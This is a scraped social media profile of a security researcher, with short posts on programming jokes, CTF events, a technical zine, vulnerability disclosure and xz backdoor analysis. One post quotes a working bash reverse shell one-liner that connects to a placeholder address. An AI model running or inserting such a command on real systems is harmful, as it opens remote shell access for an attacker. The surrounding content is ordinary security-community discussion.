Gynvael Coldwind (@gynvael.bsky.social)
@gynvael
Followers
38K
Following
11K
Media
471
Statuses
6K
security researcher/programmer/director @ HexArcana Cybersecurity GmbH ⁂ @pagedout_zine ⁂ @DragonSectorCTF ⁂ https://t.co/ShG2c5As1K ⁂ ex-Google ⁂ he/him
Zürich, Switzerland
Joined July 2009
Me coding with ~5y experience:.1. write code.Me coding with ~30y experience:.1. read docs for fopen().2. write 1 line of code.3. check 17 different things in docs/internets about fopen.4. reverse fopen implementation because this one detail. 5. decide to use different function.
31
648
3K
How to read a file in C according to NETGEAR
83
522
3K
Friday was my last day at Google. I'm saddened to leave behind my team of the last 12+ years, but I know Google's security is in great hands. It's time for a short break and then I'm moving on with plans I've made long ago – my own sec research, consulting, and education company.
75
32
1K
My first program in Python! I still find this syntax a bit confusing with no { } etc. def main(. line0: print("Hello World!"),. line1: print("What's your name?"),. line2: (x := input("Name plz: ")),. line3: print(f"Your name is: {x}").):. pass
41
90
990
So an AMD engineer and 2 Google engineers walk into a bar. and write an article about how "Hello World" in #Python works. The article turns out to be 26 pages. From Python, through C, WinAPI/Kernel, font rendering, to GPU. Enjoy!.
12
255
880
A fun and innovative ZIP bomb by David Fifield (and an excellent technical write-up - take a look if you like file format hacks):. zbsm.zip42 kB→5.5 GB.zblg.zip10 MB→281 TB.zbxl.zip46 MB→4.5 PB.
7
306
735
Python was too hard so I've switched to C++. Here's my first "Hello World"!
My first program in Python! I still find this syntax a bit confusing with no { } etc. def main(. line0: print("Hello World!"),. line1: print("What's your name?"),. line2: (x := input("Name plz: ")),. line3: print(f"Your name is: {x}").):. pass
21
47
733
I just randomly found a YouTube channel with 22 videos that explain modern cryptographic algorithms + show how to implement them in Python! Awesome for learning crypto!. The channel has 80 subs. Any chance we could show some love to the creator?.Plz RT.
15
213
701
Boss: Hey IT guy, can you program our pharmacy logo to flash or sth?.Bob: Say no more!.Narrator: Bob, a demoscene veteran, was waiting for this opportunity for 25 years.
14
116
610
TIL from @q3k and @marcan42: wget saves downloaded file's source URL (and sometimes referrer) in extended attributes. This includes the cases where the URL has a user/password in it 🙃. $ getfattr -d -m - test.user.xdg.origin.url="https://user:[email protected]/".
7
273
617
Random tip for Windows users:.If you are worried about accidentally double-clicking a malicious executable in your Download folder or are worried about random DLLs (carpet bombing / DLL hell), just DISABLE EXECUTION in that folder:. icacls Download /deny Everyone:(OI)(IO)(X).
10
144
519
I think these are the two most useful posts I have on my blog (i.e. I'm referencing them in chat a lot):. FAQ: How to learn reverse-engineering?. FAQ: How to find vulnerabilities?.
2
142
448
Just a daily reminder, that the C / C++ compiler is happy to remove any code it thinks doesn't make sense according to the standard.
13
73
434
If you're just starting in programming/infosec, here's a list of obvious and less obvious things you can put on your CV - a 🧵. Some of these things can be done in a week and might improve your CV. Did I miss something? Please add to the thread. And RT so it helps more people :).
10
154
447
Yesterday's "Breaking "DRM" in Polish trains" talk by @dsredford / MrTick / q3k was one of the best investigative reverse-engineering case studies I've seen. It's a must watch.
5
120
428
That feeling when you're in a tram and the wrong texture gets loaded.
7
55
425
Service announcement:.I've got the so-called long-COVID (3 months in at this point), so currently all my projects (YouTube livestreams, @pagedout_zine, etc) are put on hold until I get better. Sorry!.
118
14
426
A fun site with simple / entry-level hacking challenges: :).
2
109
415
Paged Out! #2 (Nov 2019) is out! And it's free to download :).This issue has 55 articles in 11 categories:.Programming.OS Internals.Assembly.Operating Systems.GameDev.Electronics.Security/Hacking.SysAdmin.Reverse Engineering.Algorithms.Writing Articles
4
211
406
Brought to you by the same school of thought as the eternal classics like:.system("cls");.and.system("pause");.
5
19
369
C++ is really hard, I just tried to write Hello World! in it and it took me way too long.
26
37
363
Some notes from analyzing the bash part obfuscation of the xz/liblzma part – link leads to the part I found most interesting – it was added in 5.6.1:.
3
114
328
Windows 11 is wonderful!.So I'm switching to Linux (Kubuntu) on my main PC - apologies to all hackers who had a shell on my device from the last re-install ~10-16 years ago. Anyway, I'll use this thread to note some funny bits I notice during migration.
22
27
332
My English YT channel with security/programming livestreams just passed the 20000 subscriber mark! I'm really happy right now :).
19
21
326
<@yyyyyyy> congrats to Drunk Sector for finding out about their team name only 40 hours into the competition!. I don't even 🤣🤣🤣. #TrolledAtCCCCTF #IDontEven #Potatos
5
35
323
Call for One Page Articles for the 1st issue of Paged Out! zin!.(it's a new free experimental deeply technical zin we're starting; it's about programming/security/hacking/demoscene/retro/electronics/etc).Details: Story: Please RT :)
8
211
308
Ah dealing with companies with poor security processes is always such a pleasure. Here's Powertek threatening me with their lawyers for disclosing (patched) vulnerabilities in their PDUs:.
12
23
283
An educational CTF for beginners - no ranking, no scoreboard, no stress :).Enjoy!.
Google CTF Beginners Quest 2021 is on!. !:). Go! Now! You have the fate of the world in your hands!
5
68
274
An informal review of CTF abuse (or how folks try to win CTFs in a not purely ethical way):. Know more stories like this which I've missed? Please share!.
14
64
256
I've been livestreaming sec/hack/code stuff in Polish for some time now. Anyone interested in streams in English?
48
65
249
A pretty amazing opportunity to see (and compare RE methods of) 4 security youtubers/streamers as they go against an upgraded Google CTF 2018 BQ RE challenge - Kudos to ReverseiT & @MurmusCTF @Zanidd @_johnhammond @LiveOverflow !.
4
60
247
So you want to make a career in low-level exploitation? Well, there is some bad news and some good news. Either way, here is some information to equip you on your way: . "FAQ: The tragedy of low-level exploitation".
5
65
232
ingredients=flour%20butter%20sugar%20egg%20salt;temperature=180;mix=1;bake=1. If Twitter can store its cookies in my browsers, I'm going to store my cookies on Twitter 😠.
2
28
226
g++ -o
give me a horror story from your specialty in five words or less.
7
17
233
I'm going to do a longer stream tomorrow (expected 4h) to solve all the challenges from Google's CTF Beginners Quest 2019. There are 13 challenges, some of them having two flags. Should be fun :).#googlectf
4
62
222
Any ideas for Masters/Bachelors thesis topics around malware analysis, reverse engineering, low-level security or other infosec topics?. Please RT too - I get this question a lot and I always struggle to answer. So I hope to use our community's wisdom and send folks here :).
27
150
222
My new hobby:.Pinging DNS/LDAP of every log4j scan attempt I find in my logs ;).
5
12
216
Current collection of cursed operators in various programming languages (from various sources). New submissions welcomed!. Featuring at least #javascript #python #c and #cpp, but most of these "work" in other languages too.
16
50
218
So it's been about a month since I switched from Windows 10 to Linux (Kubuntu) on my main workstation. Here's a 🧵with some thoughts. If you have any hints towards the points below, or in general, do let me know :)
10
9
206
Tip of the day: .Don't encrypt your backups with SHA256. Compression ratio might be good, but recovery is a terrible experience.
13
14
196
My weird php://filter/convert.iconv solution for Cool Storage System stage 2 of @1ns0mn1h4ck CTF Teaser:.Pretty crazy if you would have asked me ;).
7
104
188
A really solid command-line JSON viewer for Linux I found today: - super useful when dealing with documented-as-usual-so-not-at-all JSON APIs :).Remember to type :help to see keyboard shortcuts. And it also supports mouse in a proper way!
3
48
184
Question: An up-to-date book for getting to know Linux Kernel (internals)?. Recommendations welcomed :).If you have non-book resources on the topic: also welcomed!.
12
33
188
It's my 12th Google work anniversary yay 🎉.
9
1
183
New into CTFs? Full-format ranked CTFs look scary? Or just looking to have fun and learn something? Try the Beginners Quest @ Google CTF Quals :).#GoogleCTF.
2
80
180
After almost a full year I've scheduled the next livestream - Friday, 6PM CEST, Google Beginners Quest CTF 2021 - solving all tasks :).
9
27
181
In the topic of #GoogleCTF - I will be showing how to solve all of the Beginners Quest challenges on a special livestream tomorrow (Tue), 8pm CEST:.(recording will be available).
4
72
177
JS support in MySQL: From a programmer's perspective: Sounds pretty useful!. From a security engineer's perspective: ↓↓↓
8
31
174
The final match of Hackceler8 (GoogleCTF Final Event) is now over!.1st + $3k. PPP (@PlaidCTF) .2nd + $2k. I Use Bing.3rd + $1k. pasten (@pastenctf).4th + $500. TFNS (@FlatNetworkOrg).Congratz!.Our experimental speed-hacking competition is now over. Videos soon! GG :)
3
24
175
In case you're wondering how block ciphers work. (one of my viewers sent it to me; too funny not to share; in my defense, the stream wasn't about block ciphers 🙃)
3
36
171
This reminded me of when early in my career I reported a vulnerability in Starcraft map format (potential RCE) to Blizzard and in reply got advice to install an anti-virus and a firewall 🙃. Reporting vulnerabilities is an art of its own 😆.
Vulnerability Disclosure:. Me: Hi, do you have a contact to discuss vulnerabilities in your product?.Them: Na fam, chill! We got this!!. 🤨
6
18
171
Paged Out! #4 has some amaazinggg stuff inside. And it's free. Like free free, you don't even have to give out your email address :).
3
49
167
Question: What's the shortest Windows reverse shell that you know? Is there something like GNU/Linux' bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ?. Obligatory disclaimer: Asking for a friend.
14
28
162
FAQ: How to find vulnerabilities?.
3
96
164
Recording of solving all (19) challenges from #GoogleCTF Beginners Quest is up: (description has timestamps for all challenges + a link to the github repo with scripts/notes).
1
65
162
Our security team is hiring in Zurich/Sunnyvale/Seattle!.We're looking for security specialists interested in security code reviews of both large complex systems and smaller applications (all over the software stack - from web apps, down to even firmware). DM me if interested.
6
58
159
A question:.Which infosec companies employ & hire folks on Vulnerability Researcher position (>50% of work time spent on vulnerability research)?. I know a few, but I'm wondering if there are more companies like that. And yes, I know it's pretty rare :).
29
29
156
Found this on reddit, had to re-share :)
4
19
152
Oh my. Please don't ;). A friendly reminder that you pronounce "eval" the same way as "evil".
5
15
156
Service announcement update:.Still having post COVID syndrome (9 months in at this point). All projects (YouTube livestreams, @pagedout_zine, etc) are still on hold. Sorry!.
28
3
158
Trying to add enough cameras over my hardware desk so I could actually include it in livestreams. Progress so far includes 2 main cameras in place (overhead and microscope) and a lot of cable management on the horizon.
10
1
151
Boosting signal for folks analyzing liblzma/xz:.q3k: "I have managed to extract a list of encoded strings within the liblzma/xz backdoor payload (5.6.1)".
2
51
149
@LiveOverflow @svblxyz @KodyKinzie @YouTube Nah, our channels will be fine since we only show how to bypass INsecure computer systems ;). On a more serious note I'll take a look when I'm back from vacation.
1
7
140
Congratz to @EatSleepPwnRpt for top1 in Geneva! Good Game, Well Played! :).@DragonSectorCTF finished 2nd this time (yay!), with @p4_team third (well done!). Kudos to @1ns0mn1h4ck for making yet another great CTF :)
3
34
150
That happy feeling when you're porting a legacy script from Python 2 to Python 3 and all it takes is adding ( ) to prints ☺️.
8
2
146
Members of my CTF team & the SPS train repair company will meet NEWAG, the train manufacturer, in court on Wednesday (you might remember the 37C3 talk; link in reply). The lawsuit was initiated by NEWAG, but, according to reporting, counterclaims were filed by SPS as well. 1/3.
Just two days left until the first hearing in Newag's lawsuit against us (Dragon Sector members) and SPS. In case you've missed it, we're being accused of infringing upon Newag's intellectual property and unfair competition. More details:
6
30
142
Want to support security researchers from Dragon Sector in covering legal costs piling up after they went public with logic bombs in train firmware?.IBAN for donations is available here:. Talks for context:.
1
56
144
Hey @github, what's the reason that you're allowing an account impersonating me, abusing my copyrights+trademarks to stand active for over 11 days from it being reported to you by multiple parties?. Is this the typical pace you're dealing with abuse?. Ctx:
If you have received an e-mail from gynvael@coldwind.dev (note .dev, not .pl) then it's a social engineering attempt by an unknown party. I was notified that at least several Polish security researchers were targeted. Please let me know if you got an e-mail from that domain too.
5
33
140
Dear Jonathan: "Accepted" means an engineer has accepted to look at your report - that's about it, nothing less, nothing more. It does not mean your report has been considered valid - this will be decided later on and communicated in a reply.
10
6
134
Return to the basics today on stream - use-after-free class of bugs :). When: 8pm CET.Where:
1
54
135
If you have received an e-mail from gynvael@coldwind.dev (note .dev, not .pl) then it's a social engineering attempt by an unknown party. I was notified that at least several Polish security researchers were targeted. Please let me know if you got an e-mail from that domain too.
5
42
136
Absolutely amazing article on ZIP files by @hansw2000, with in-depth description of the compression algorithms and a step-by-step example implementation!.
0
45
130
Hey folks! Since my sabbatical is over I wanted to grab this opportunity to discuss what was (Google), what will be (my next plans), and get back to livestreaming at the same time. EN (this Tue 8PM CEST): PL (this Wed 8PM CEST):
0
15
132
Our CTF team placed top1 @ in 2019!.That's the 3rd top1 in the history of our team, and I'm really proud of our team's accomplishments!.Kudos to our captain valis, our vice-captain @dsredford, all the team members and all guest players that played with us!.
2019 was a great year for Dragon Sector!.🏆1st place at global ranking for the 2nd year in a row & 3rd time in the history of our team.🥇1st place at 2 CTFs.🥈2nd place at 5 CTFs.🥉3rd place at 5 CTFs.💻And also organized a well received Dragon CTF 2019!
3
4
133
def found an RCE in a terminal with ANSI escape codes - I guess '80s called and wanted their vulnerabilities back ;).
2
28
129
This case is hilarious ;).It's an 0-day. When SSD tried to report to @NETGEAR / @Bugcrowd, whoever handled the report seems to have ???misread the newest firmware version for R7000 as 1.3.2.134???, and the bug affects only 1.0.11.116. Problem is, 1.0.11.116 is the newest fw🙃.
New advisory is now out!. The Nighthawk R7000 is a popular Netgear router, with over 50,000 positive reviews on Amazon. Find out how a vulnerability in NETGEAR R7000 allows an attacker to run arbitrary code without requiring authentication.
1
36
122
I'm in full vacation mode and I decided to play Amberstar (1992). I played a few hours and decided the UX is, well, 1992-like. So now I'm learning AmigaOS/M68K assembly to change some things that were annoying me. I'll be posting some curious things I find in this thread.
3
17
131
How to make sure no one complains about your soldering quality - tutorial:.1. Solder wires to the PCB. 2. Put a huge blob of glue on top of it. 3. 4. Profit?
5
6
128
This! The "Reverse Compilation Techniques" thesis by @criscifuentes was one of two main resources I've used when learning reverse engineering (the other was "Reversing: Secrets of Reverse Engineering" book). Definitely recommended reading :).
A sometimes lost fact, but the entire field of decompilation using compiler and program analysis techniques that we know as standard practice today as seen in IDA Hex Rays and Ghidra was invented by @criscifuentes and her thesis on the DCC decompiler in 1994.
0
23
129
This idea is absolutely barbaric and just gruesome. Folks, I am a vulnerability researcher. I stare at the screen the whole day looking at code. And you want me to do THIS?! The whole idea is bound to just bring pain and suffering to people. I'm fine with the boxing part though.
@hackthebox_eu ok, hear me out. "Hack The Boxing". It's like Chess Boxing, but we alternate between boxing and solving a HTB machine. I just thought up the concept, but can't claim credit for the name.
5
8
131
I don't like this fuzzer.
what doesn't kill you mutates & will try again.
0
15
122
A not-so-short writeup about solving a reverse-engineering challenge using a side-channel attack: .that's from Byte Bandits CTF 2023 - gg :).
3
33
126
One of my favorite things about Switzerland:.trust in society. The flower shop in the photo is closed, but the merchandise is left outside. The sign blocking the door says "if the door is closed, it's self service; scan QR-CODE to pay with TWINT". And that's not a rare thing!
7
2
122
Finally reached 10k subs on my English YT channel! :).Thank you for your trust! (though seriously, keep verifying what I say).And kudos + big thx to my livestream team for helping me out: @foxtrot_0x4fult @KrzaQ2 @disconnect3d_pl @masakralol and maryush :).
3
16
126